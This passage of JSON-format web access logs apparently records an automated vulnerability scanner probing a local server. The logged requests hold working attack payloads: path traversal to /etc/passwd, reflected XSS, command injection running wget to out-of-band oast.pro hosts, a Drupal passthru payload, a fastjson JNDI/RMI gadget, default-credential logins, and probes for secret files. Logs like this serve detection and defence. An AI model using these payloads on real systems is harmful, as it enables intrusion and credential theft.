HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfwrepo.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/bps-backup/logs/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.production.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/device-id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5EhniacYmegyQzVyw3rEBHny.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/57 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://ca2tuc8smpv1g2s80ca0crof4ya8mid9t.oast.pro`;busybox wget http://ca2tuc8smpv1g2s80ca0hip453r4jmb79.oast.pro&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.test.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/CI.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static/../../../a/../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.006","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"admuser=admin&admpass=;wget http://ca2tuc8smpv1g2s80ca0weuac1rw1k4g8.oast.pro;&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setSysAdm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/login.shtml", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vkd/GetWelcomeScreen.event HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#post_render][]\x22\x0D\x0A\x0D\x0Apassthru\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#type]\x22\x0D\x0A\x0D\x0Amarkup\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#markup]\x22\x0D\x0A\x0D\x0Acat /etc/passwd\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22form_id\x22\x0D\x0A\x0D\x0Auser_register_form\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22_drupal_ajax\x22\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"127.0.0.1/user/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cp/Shares?user=&protocol=webaccess&v=2.3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/58 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipython/tree HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://ca2tuc8smpv1g2s80ca078ooecutmo4pt.oast.pro`;wget http://ca2tuc8smpv1g2s80ca0cywyomcu13wu5.oast.pro&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"userName=admin&userPassword=dolphinscheduler123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dolphinscheduler/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apimanui/api-manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://127.0.0.1/ecp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.dev.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22Lcom.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca2tuc8smpv1g2s80ca0ub9mp759bs14w.oast.pro/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 